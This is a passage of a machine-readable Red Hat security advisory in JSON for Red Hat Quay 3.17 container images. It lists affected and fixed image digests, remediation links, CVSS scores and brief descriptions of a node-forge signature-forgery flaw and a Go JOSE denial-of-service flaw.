          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "RHBZ#2452464",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452464"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33894",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc2313#section-8",
          "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
        },
        {
          "category": "external",
          "summary": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE",
          "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
        },
        {
          "category": "external",
          "summary": "https://www.rfc-editor.org/rfc/rfc8017.html",
          "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
        }
      ],
      "release_date": "2026-03-27T20:45:49.583000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification"
    },
    {
      "cve": "CVE-2026-34986",
      "cwe": {
        "id": "CWE-131",
        "name": "Incorrect Calculation of Buffer Size"
      },
      "discovery_date": "2026-04-06T17:01:34.639203+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2455470"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "RHBZ#2455470",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455470"
        },
        {
